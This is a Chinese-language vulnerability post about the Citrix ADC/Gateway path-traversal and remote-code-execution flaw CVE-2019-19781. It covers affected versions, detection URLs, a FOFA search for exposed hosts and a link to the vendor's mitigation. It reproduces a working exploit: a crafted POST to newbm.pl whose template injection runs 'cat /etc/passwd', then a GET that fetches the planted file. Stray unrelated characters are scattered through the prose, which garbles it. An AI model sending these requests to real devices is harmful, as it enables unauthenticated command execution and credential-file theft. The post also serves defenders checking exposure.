漏洞描述
Citrix旗下多款交付控制器和網(wǎng)關(guān)存在RCE漏洞,攻擊者在無(wú)需身份驗(yàn)證的情況下就可執(zhí)行任意命令闰渔。根據(jù)其他安全網(wǎng)站的說(shuō)法,這個(gè)RCE漏洞會(huì)有一個(gè)標(biāo)記漏洞(其中之一的標(biāo)記),即本次報(bào)道的Citrx路徑遍歷漏洞(CVE-2019-19781)拉庵。Citrx路徑遍歷漏洞(CVE-2019-19781)利用方式的PoC已被公開(kāi)。該漏洞利用復(fù)雜性低套蒂,且無(wú)權(quán)限要求钞支,攻擊者只能遍歷vpns文件夾,但攻擊者可能利用Citrx路徑遍歷漏洞進(jìn)行RCE漏洞試探操刀,從而發(fā)起進(jìn)一步精準(zhǔn)攻擊烁挟。
影響范圍
Citrix NetScaler ADC and NetScaler Gateway version 10.5,Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 骨坑,Citrix ADC and Citrix Gateway version 13.0
漏洞檢測(cè)方法
根據(jù)此次公開(kāi)的PoC顯示撼嗓,該洞目錄遍歷被限制子在vpns文件夾下,任意用戶可通過(guò)HTTP請(qǐng)求直接訪問(wèn)該目錄下的文件欢唾。
https://xx.xx.xx.xx/vpn/../vpns/services.html
https://xx.xx.xx.xx/vpn/../vpns/smb.conf
如果沒(méi)有修復(fù)的話的會(huì)返回 http 200
通過(guò)fofa搜索
title="Citrix"
目前還是有很多沒(méi)打補(bǔ)丁的
附上POC且警,建議修改文件名,文件名為:jas502n
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97
url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
請(qǐng)求上傳的內(nèi)容
GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
以上代碼來(lái)自jas502n大佬礁遣,GitHub地址:https://github.com/jas502n/CVE-2019-19781
修復(fù)建議
請(qǐng)參考官方緩解措施:https://support.citrix.com/article/CTX267679
